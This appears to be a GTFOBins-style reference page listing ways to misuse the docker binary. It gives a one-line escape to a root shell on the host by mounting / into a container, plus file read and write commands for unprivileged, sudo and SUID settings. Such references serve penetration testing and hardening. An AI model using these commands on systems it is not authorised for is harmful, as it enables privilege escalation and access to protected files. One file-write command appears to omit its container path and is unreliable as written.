.. / docker

Sponsor Fork Star

• Shell
• File write
• File read

Shell

This executable can spawn an interactive system shell.

• Unprivileged

  This function can be performed by any unprivileged user.

  docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh

File write

This executable can write data to local files.

• Comment

  Write a file by copying it to a temporary container ($CONTAINER_ID) and back to the target destination on the host.

  Unprivileged

  This function can be performed by any unprivileged user.

  echo DATA >/path/to/temp-file
  docker cp /path/to/temp-file $CONTAINER_ID:temp-file
  docker cp $CONTAINER_ID /path/to/output-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  echo DATA >/path/to/temp-file
  docker cp /path/to/temp-file $CONTAINER_ID:temp-file
  docker cp $CONTAINER_ID /path/to/output-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  echo DATA >/path/to/temp-file
  docker cp /path/to/temp-file $CONTAINER_ID:temp-file
  docker cp $CONTAINER_ID /path/to/output-file

File read

This executable can read data from local files.

• Comment

  Read a file by copying it to a temporary container ($CONTAINER_ID) and back to a new location on the host.

  Unprivileged

  This function can be performed by any unprivileged user.

  docker cp /path/to/input-file $CONTAINER_ID:input-file
  docker cp $CONTAINER_ID:input-file /path/to/temp-file
  cat /path/to/temp-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  docker cp /path/to/input-file $CONTAINER_ID:input-file
  docker cp $CONTAINER_ID:input-file /path/to/temp-file
  cat /path/to/temp-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  docker cp /path/to/input-file $CONTAINER_ID:input-file
  docker cp $CONTAINER_ID:input-file /path/to/temp-file
  cat /path/to/temp-file

Source | History